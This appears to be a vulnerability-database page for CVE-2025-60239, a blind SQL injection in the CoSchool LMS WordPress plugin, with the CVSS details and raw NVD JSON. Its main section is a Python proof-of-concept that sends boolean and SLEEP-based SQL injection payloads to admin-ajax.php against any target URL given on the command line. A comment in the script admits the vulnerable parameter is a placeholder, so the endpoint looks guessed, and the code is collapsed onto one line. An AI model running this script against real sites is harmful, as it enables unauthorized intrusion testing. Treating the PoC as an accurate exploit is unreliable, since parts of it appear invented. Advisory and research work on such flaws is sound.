Security Vulnerability Report
中文
CVE-2025-60239 CVSS 8.5 HIGH

CVE-2025-60239

Published: 2025-11-06 16:16:06
Last Modified: 2026-04-27 16:16:34

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Codexpert, Inc CoSchool LMS coschool allows Blind SQL Injection.This issue affects CoSchool LMS: from n/a through <= 1.4.3.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

CoSchool LMS <= 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60239 PoC - CoSchool LMS Blind SQL Injection # Target: WordPress site with CoSchool LMS plugin <= 1.4.3 def test_vulnerability(target_url): """ Test for CVE-2025-60239 Blind SQL Injection vulnerability """ # Base URL with vulnerable endpoint # Replace with actual vulnerable parameter vuln_url = f"{target_url}/wp-admin/admin-ajax.php" # Blind SQL Injection payload - Boolean based # This payload tests if the injection point is vulnerable # by checking if we can influence the query result payload = { 'action': 'coschool_get_courses', 'course_id': '1 OR 1=1', 'user_id': '1' } # Time-based blind SQL injection payload # Uses SLEEP() function to confirm vulnerability time_payload = { 'action': 'coschool_get_courses', 'course_id': '1 AND SLEEP(5)', 'user_id': '1' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-60239 - CoSchool LMS Blind SQL Injection") try: # Test boolean-based injection print("[*] Sending boolean-based injection test...") response1 = requests.post(vuln_url, data=payload, headers=headers, timeout=10) # Test time-based injection print("[*] Sending time-based injection test...") response2 = requests.post(vuln_url, data=time_payload, headers=headers, timeout=30) # Analyze responses if response2.elapsed.total_seconds() > 4: print("[+] VULNERABLE! Time-based SQL injection confirmed") print(f"[+] Response time: {response2.elapsed.total_seconds()}s") else: print("[-] Target may not be vulnerable or endpoint not found") except requests.exceptions.Timeout: print("[+] VULNERABLE! Request timed out (expected with SLEEP payload)") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-site.com" test_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60239", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:06.463", "lastModified": "2026-04-27T16:16:34.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Codexpert, Inc CoSchool LMS coschool allows Blind SQL Injection.This issue affects CoSchool LMS: from n/a through <= 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/coschool/vulnerability/wordpress-coschool-lms-plugin-1-4-3-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}